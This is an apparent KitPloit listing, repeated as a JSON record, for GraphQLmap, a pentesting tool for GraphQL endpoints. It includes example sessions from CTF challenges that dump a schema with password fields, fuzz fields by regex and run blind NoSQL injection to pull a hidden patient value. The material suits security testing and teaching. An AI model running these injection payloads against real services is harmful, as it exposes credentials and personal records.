Description
[](<https://1.bp.blogspot.com/-ihaDbywhNQw/YKS25inlRmI/AAAAAAAAWOQ/JCjkKh9Unvclz8On9bTzd5WyYJG3jPLdACNcBGAsYHQ/s813/GraphQLmap.png>)
GraphQLmap is a [scripting](<https://www.kitploit.com/search/label/Scripting> "scripting" ) engine to interact with a graphql endpoint for [pentesting](<https://www.kitploit.com/search/label/Pentesting> "pentesting" ) purposes.
**Install**
$ git clone https://github.com/swisskyrepo/GraphQLmap
$ python graphqlmap.py
_____ _ ____ _
/ ____| | | / __ \| |
| | __ _ __ __ _ _ __ | |__ | | | | | _ __ ___ __ _ _ __
| | |_ | '__/ _` | '_ \| '_ \| | | | | | '_ ` _ \ / _` | '_ \
| |__| | | | (_| | |_) | | | | |__| | |____| | | | | | (_| | |_) |
\_____|_| \__,_| .__/|_| |_|\___\_\______|_| |_| |_|\__,_| .__/
| | | |
|_| |_|
Author:Swissky Version:1.0
usage: graphqlmap.py [-h] [-u URL] [-v [VERBOSITY]] [--method [METHOD]] [--headers [HEADERS]]
optional arguments:
-h, --help show this help message and exit
-u URL URL to query : example.com/graphql?query={}
-v [VERBOSITY] Enable verbosity
--method [METHOD] HTTP Method to use interact with /graphql endpoint
--headers [HEADERS] HTTP Headers sent to /graphql endpoint
--json Send requests using POST and JSON
**Features and examples**
Examples are based on several CTF challenges from HIP2019.
**Connect to a graphql endpoint**
python3 graphqlmap.py -u https://yourhostname.com/graphql -v --method POST --headers '{"Authorization" : "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZXh0Ijoibm8gc2VjcmV0cyBoZXJlID1QIn0.JqqdOesC-R4LtOS9H0y7bIq-M8AGYjK92x4K3hcBA6o"}'
**Dump a GraphQL schema**
Use `dump_new` to dump the GraphQL schema, this function will automaticly populate the "autocomplete" with the found fields.
[](<https://asciinema.org/a/14YuWoDOyCztlx7RFykILit4S> "GraphQLmap is a scripting engine to interact with a graphql endpoint for pentesting purposes. \(11\)" )
[](<https://asciinema.org/a/14YuWoDOyCztlx7RFykILit4S> "GraphQLmap is a scripting engine to interact with a graphql endpoint for pentesting purposes. \(11\)" )
[ Live Example](<https://asciinema.org/a/14YuWoDOyCztlx7RFykILit4S> "GraphQLmap is a scripting engine to interact with a graphql endpoint for pentesting purposes. \(11\)" )
GraphQLmap > dump_new
============= [SCHEMA] ===============
e.g: name[Type]: arg (Type!)
Query
doctor[]: email (String!),
doctors[Doctor]:
patients[Patient]:
patient[]: id (ID!),
allrendezvous[Rendezvous]:
rendezvous[]: id (ID!),
Doctor
id[ID]:
firstName[String]:
lastName[String]:
specialty[String]:
patients[None]:
rendezvous[None]:
email[String]:
password[String]:
[...]
**Interact with a GraphQL endpoint**
Write a GraphQL request and execute it.
GraphQLmap > {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admin\"} }"){firstName lastName id}}
{
"data": {
"doctors": [
{
"firstName": "Admin",
"id": "5d089c51dcab2d0032fdd08d",
"lastName": "Admin"
}
]
}
}
**GraphQL field fuzzing**
Use `GRAPHQL_INCREMENT` and `GRAPHQL_CHARSET` to fuzz a parameter.
[](<https://asciinema.org/a/ICCz3PqHVNrBf262x6tQfuwqT> "GraphQLmap is a scripting engine to interact with a graphql endpoint for pentesting purposes. \(12\)" )
[](<https://asciinema.org/a/ICCz3PqHVNrBf262x6tQfuwqT> "GraphQLmap is a scripting engine to interact with a graphql endpoint for pentesting purposes. \(12\)" )
[ Live Example](<https://asciinema.org/a/ICCz3PqHVNrBf262x6tQfuwqT> "GraphQLmap is a scripting engine to interact with a graphql endpoint for pentesting purposes. \(12\)" )
GraphQLmap > {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"AdmiGRAPHQL_CHARSET\"} }"){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi!\"} }"){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi$\"} }"){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi%\"} }"){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi(\"} }"){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi)\"} }"){firstName lastName id}}
[+] Query: (206) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi*\"} }"){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi+\"} }"){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi,\"} }"){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi-\"} }"){firstName lastName id}}
[+] Query: (206) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi.\"} }"){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi/\"} }"){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi0\"} }"){firstName lastName id}}
[+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi1\"} }"){firstName lastName id}}
[+] Query: (206) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi?\"} }"){firstName lastName id}}
[+] Query: (206) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admin\"} }"){firstName lastName id}}
**NoSQLi injection**
Use `BLIND_PLACEHOLDER` inside the query for the `nosqli` function.
[](<https://asciinema.org/a/wp2lixHqRV0pxxhZ8nsgUj6s7> "GraphQLmap is a scripting engine to interact with a graphql endpoint for pentesting purposes. \(13\)" )
[](<https://asciinema.org/a/wp2lixHqRV0pxxhZ8nsgUj6s7> "GraphQLmap is a scripting engine to interact with a graphql endpoint for pentesting purposes. \(13\)" )
[ Live Example](<https://asciinema.org/a/wp2lixHqRV0pxxhZ8nsgUj6s7> "GraphQLmap is a scripting engine to interact with a graphql endpoint for pentesting purposes. \(13\)" )
GraphQLmap > nosqli
Query > {doctors(options: "{\"\"patients.ssn\":1}", search: "{ \"patients.ssn\": { \"$regex\": \"^BLIND_PLACEHOLDER\"}, \"lastName\":\"Admin\" , \"firstName\":\"Admin\" }"){id, firstName}}
Check > 5d089c51dcab2d0032fdd08d
Charset > 0123456789abcdef-
[+] Data found: 4f537c0a-7da6-4acc-81e1-8c33c02ef3b
GraphQLmap >
**SQL injection**
GraphQLmap > postgresqli
GraphQLmap > mysqli
GraphQLmap > mssqli
**TODO**
* Docker with [vulnerable](<https://www.kitploit.com/search/label/Vulnerable> "vulnerable" ) GraphQL
* Unit tests
* Handle node
{
user {
edges {
node {
username
}
}
}
}
**[Download GraphQLmap](<https://github.com/swisskyrepo/GraphQLmap> "Download GraphQLmap" )**
{"id": "KITPLOIT:5693649203913098224", "vendorId": null, "type": "kitploit", "bulletinFamily": "tools", "title": "GraphQLmap - A Scripting Engine To Interact With A Graphql Endpoint For Pentesting Purposes", "description": "[](<https://1.bp.blogspot.com/-ihaDbywhNQw/YKS25inlRmI/AAAAAAAAWOQ/JCjkKh9Unvclz8On9bTzd5WyYJG3jPLdACNcBGAsYHQ/s813/GraphQLmap.png>)\n\n \n\n\nGraphQLmap is a [scripting](<https://www.kitploit.com/search/label/Scripting> \"scripting\" ) engine to interact with a graphql endpoint for [pentesting](<https://www.kitploit.com/search/label/Pentesting> \"pentesting\" ) purposes.\n\n \n\n\n**Install** \n\n \n \n $ git clone https://github.com/swisskyrepo/GraphQLmap \n $ python graphqlmap.py \n _____ _ ____ _ \n / ____| | | / __ \\| | \n | | __ _ __ __ _ _ __ | |__ | | | | | _ __ ___ __ _ _ __ \n | | |_ | '__/ _` | '_ \\| '_ \\| | | | | | '_ ` _ \\ / _` | '_ \\ \n | |__| | | | (_| | |_) | | | | |__| | |____| | | | | | (_| | |_) | \n \\_____|_| \\__,_| .__/|_| |_|\\___\\_\\______|_| |_| |_|\\__,_| .__/ \n | | | | \n |_| |_| \n Author:Swissky Version:1.0 \n usage: graphqlmap.py [-h] [-u URL] [-v [VERBOSITY]] [--method [METHOD]] [--headers [HEADERS]] \n \n optional arguments: \n -h, --help show this help message and exit \n -u URL URL to query : example.com/graphql?query={} \n -v [VERBOSITY] Enable verbosity \n --method [METHOD] HTTP Method to use interact with /graphql endpoint \n --headers [HEADERS] HTTP Headers sent to /graphql endpoint \n --json Send requests using POST and JSON\n\n \n**Features and examples** \n\n\nExamples are based on several CTF challenges from HIP2019.\n\n**Connect to a graphql endpoint** \n\n \n \n python3 graphqlmap.py -u https://yourhostname.com/graphql -v --method POST --headers '{\"Authorization\" : \"Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZXh0Ijoibm8gc2VjcmV0cyBoZXJlID1QIn0.JqqdOesC-R4LtOS9H0y7bIq-M8AGYjK92x4K3hcBA6o\"}' \n \n\n \n**Dump a GraphQL schema** \n\n\nUse `dump_new` to dump the GraphQL schema, this function will automaticly populate the \"autocomplete\" with the found fields. \n[](<https://asciinema.org/a/14YuWoDOyCztlx7RFykILit4S> \"GraphQLmap is a scripting engine to interact with a graphql endpoint for pentesting purposes. \\(11\\)\" )\n\n[\uf3a5](<https://asciinema.org/a/14YuWoDOyCztlx7RFykILit4S> \"GraphQLmap is a scripting engine to interact with a graphql endpoint for pentesting purposes. \\(11\\)\" )\n\n[ Live Example](<https://asciinema.org/a/14YuWoDOyCztlx7RFykILit4S> \"GraphQLmap is a scripting engine to interact with a graphql endpoint for pentesting purposes. \\(11\\)\" )\n \n \n GraphQLmap > dump_new \n ============= [SCHEMA] =============== \n e.g: name[Type]: arg (Type!) \n \n Query \n doctor[]: email (String!), \n doctors[Doctor]: \n patients[Patient]: \n patient[]: id (ID!), \n allrendezvous[Rendezvous]: \n rendezvous[]: id (ID!), \n Doctor \n id[ID]: \n firstName[String]: \n lastName[String]: \n specialty[String]: \n patients[None]: \n rendezvous[None]: \n email[String]: \n password[String]: \n [...]\n\n \n**Interact with a GraphQL endpoint** \n\n\nWrite a GraphQL request and execute it.\n \n \n GraphQLmap > {doctors(options: 1, search: \"{ \\\"lastName\\\": { \\\"$regex\\\": \\\"Admin\\\"} }\"){firstName lastName id}} \n { \n \"data\": { \n \"doctors\": [ \n { \n \"firstName\": \"Admin\", \n \"id\": \"5d089c51dcab2d0032fdd08d\", \n \"lastName\": \"Admin\" \n } \n ] \n } \n }\n\n \n**GraphQL field fuzzing** \n\n\nUse `GRAPHQL_INCREMENT` and `GRAPHQL_CHARSET` to fuzz a parameter. \n[](<https://asciinema.org/a/ICCz3PqHVNrBf262x6tQfuwqT> \"GraphQLmap is a scripting engine to interact with a graphql endpoint for pentesting purposes. \\(12\\)\" )\n\n[\uf3a5](<https://asciinema.org/a/ICCz3PqHVNrBf262x6tQfuwqT> \"GraphQLmap is a scripting engine to interact with a graphql endpoint for pentesting purposes. \\(12\\)\" )\n\n[ Live Example](<https://asciinema.org/a/ICCz3PqHVNrBf262x6tQfuwqT> \"GraphQLmap is a scripting engine to interact with a graphql endpoint for pentesting purposes. \\(12\\)\" )\n \n \n GraphQLmap > {doctors(options: 1, search: \"{ \\\"lastName\\\": { \\\"$regex\\\": \\\"AdmiGRAPHQL_CHARSET\\\"} }\"){firstName lastName id}} \n [+] Query: (45) {doctors(options: 1, search: \"{ \\\"lastName\\\": { \\\"$regex\\\": \\\"Admi!\\\"} }\"){firstName lastName id}} \n [+] Query: (45) {doctors(options: 1, search: \"{ \\\"lastName\\\": { \\\"$regex\\\": \\\"Admi$\\\"} }\"){firstName lastName id}} \n [+] Query: (45) {doctors(options: 1, search: \"{ \\\"lastName\\\": { \\\"$regex\\\": \\\"Admi%\\\"} }\"){firstName lastName id}} \n [+] Query: (45) {doctors(options: 1, search: \"{ \\\"lastName\\\": { \\\"$regex\\\": \\\"Admi(\\\"} }\"){firstName lastName id}} \n [+] Query: (45) {doctors(options: 1, search: \"{ \\\"lastName\\\": { \\\"$regex\\\": \\\"Admi)\\\"} }\"){firstName lastName id}} \n [+] Query: (206) {doctors(options: 1, search: \"{ \\\"lastName\\\": { \\\"$regex\\\": \\\"Admi*\\\"} }\"){firstName lastName id}} \n [+] Query: (45) {doctors(options: 1, search: \"{ \\\"lastName\\\": { \\\"$regex\\\": \\\"Admi+\\\"} }\"){firstName lastName id}} \n [+] Query: (45) {doctors(options: 1, search: \"{ \\\"lastName\\\": { \\\"$regex\\\": \\\"Admi,\\\"} }\"){firstName lastName id}} \n [+] Query: (45) {doctors(options: 1, search: \"{ \\\"lastName\\\": { \\\"$regex\\\": \\\"Admi-\\\"} }\"){firstName lastName id}} \n [+] Query: (206) {doctors(options: 1, search: \"{ \\\"lastName\\\": { \\\"$regex\\\": \\\"Admi.\\\"} }\"){firstName lastName id}} \n [+] Query: (45) {doctors(options: 1, search: \"{ \\\"lastName\\\": { \\\"$regex\\\": \\\"Admi/\\\"} }\"){firstName lastName id}} \n [+] Query: (45) {doctors(options: 1, search: \"{ \\\"lastName\\\": { \\\"$regex\\\": \\\"Admi0\\\"} }\"){firstName lastName id}} \n [+] Query: (45) {doctors(options: 1, search: \"{ \\\"lastName\\\": { \\\"$regex\\\": \\\"Admi1\\\"} }\"){firstName lastName id}} \n [+] Query: (206) {doctors(options: 1, search: \"{ \\\"lastName\\\": { \\\"$regex\\\": \\\"Admi?\\\"} }\"){firstName lastName id}} \n [+] Query: (206) {doctors(options: 1, search: \"{ \\\"lastName\\\": { \\\"$regex\\\": \\\"Admin\\\"} }\"){firstName lastName id}}\n\n \n**NoSQLi injection** \n\n\nUse `BLIND_PLACEHOLDER` inside the query for the `nosqli` function. \n[](<https://asciinema.org/a/wp2lixHqRV0pxxhZ8nsgUj6s7> \"GraphQLmap is a scripting engine to interact with a graphql endpoint for pentesting purposes. \\(13\\)\" )\n\n[\uf3a5](<https://asciinema.org/a/wp2lixHqRV0pxxhZ8nsgUj6s7> \"GraphQLmap is a scripting engine to interact with a graphql endpoint for pentesting purposes. \\(13\\)\" )\n\n[ Live Example](<https://asciinema.org/a/wp2lixHqRV0pxxhZ8nsgUj6s7> \"GraphQLmap is a scripting engine to interact with a graphql endpoint for pentesting purposes. \\(13\\)\" )\n \n \n GraphQLmap > nosqli \n Query > {doctors(options: \"{\\\"\\\"patients.ssn\\\":1}\", search: \"{ \\\"patients.ssn\\\": { \\\"$regex\\\": \\\"^BLIND_PLACEHOLDER\\\"}, \\\"lastName\\\":\\\"Admin\\\" , \\\"firstName\\\":\\\"Admin\\\" }\"){id, firstName}} \n Check > 5d089c51dcab2d0032fdd08d \n Charset > 0123456789abcdef- \n [+] Data found: 4f537c0a-7da6-4acc-81e1-8c33c02ef3b \n GraphQLmap >\n\n \n**SQL injection** \n\n \n \n GraphQLmap > postgresqli \n GraphQLmap > mysqli \n GraphQLmap > mssqli\n\n \n**TODO** \n\n\n * Docker with [vulnerable](<https://www.kitploit.com/search/label/Vulnerable> \"vulnerable\" ) GraphQL\n * Unit tests\n * Handle node\n \n \n { \n user { \n edges { \n node { \n username \n } \n } \n } \n } \n \n\n \n \n\n\n**[Download GraphQLmap](<https://github.com/swisskyrepo/GraphQLmap> \"Download GraphQLmap\" )**\n", "published": "2021-05-22T12:30:00", "modified": "2021-05-22T12:30:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "http://www.kitploit.com/2021/05/graphqlmap-scripting-engine-to-interact.html", "reporter": "KitPloit", "references": ["https://github.com/swisskyrepo/GraphQLmap"], "cvelist": [], "immutableFields": [], "lastseen": "2022-04-07T12:01:58", "viewCount": 226, "enchantments": {"dependencies": {}, "score": {"value": 0.2, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.2}, "_state": {"dependencies": 1659899726, "score": 1659843777}, "_internal": {"score_hash": "fcd9a7f2e182634e1d4cd0e98bd15245"}, "toolHref": "https://github.com/swisskyrepo/GraphQLmap"}
{}